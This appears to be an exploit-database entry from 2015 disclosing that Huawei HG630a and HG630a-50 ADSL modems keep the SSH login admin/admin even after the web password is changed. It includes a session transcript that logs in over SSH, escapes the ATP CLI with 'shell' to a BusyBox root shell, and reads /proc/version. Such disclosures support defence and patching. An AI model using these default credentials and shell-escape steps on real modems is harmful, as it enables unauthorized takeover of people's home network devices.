Huawei HG630a and HG630a-50 - Default SSH Admin Password on ADSL Modems Vulnerability

2015-11-10T00:00:00
ID 1337DAY-ID-24528
Type zdt
Reporter Murat Sahin
Modified 2015-11-10T00:00:00

Description

Exploit for hardware platform in category remote exploits

                                        
                                            # Exploit Title: Huawei HG630a and HG630a-50 Default SSH Admin Password on
Adsl Modems
# Date: 10.11.2015
# Exploit Author: Murat Sahin
# Vendor Homepage: Huawei
# Version: HG630a and HG630a-50
# Tested on: linux,windows
 
Adsl modems force you to change admin web interface password. Even though
you can change admin password on the web interface,  the password you
assign does not apply to ssh. So, SSH password always  will be
'Username:admin Password:admin'.
 
Ex:
 
*ssh [email protected] <[email protected]>*
[email protected] <[email protected]>'s password:*admin*
PTY allocation request failed on channel 0
------------------------------
-
-----Welcome to ATP Cli------
-------------------------------
ATP>?
?
cls
debug
help
save
?
exit
ATP>shell
shell
 
 
BusyBox vv1.9.1 (2013-12-31 16:16:20 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
 
# cat /proc/version
cat /proc/version
Linux version 2.6.30 ([email protected]) (gcc version 4.4.2
(Buildroot 2010.02-git) ) #10 SMP PREEMPT Tue Dec 31 16:20:50 CST 2013
#

#  0day.today [2018-01-02]  #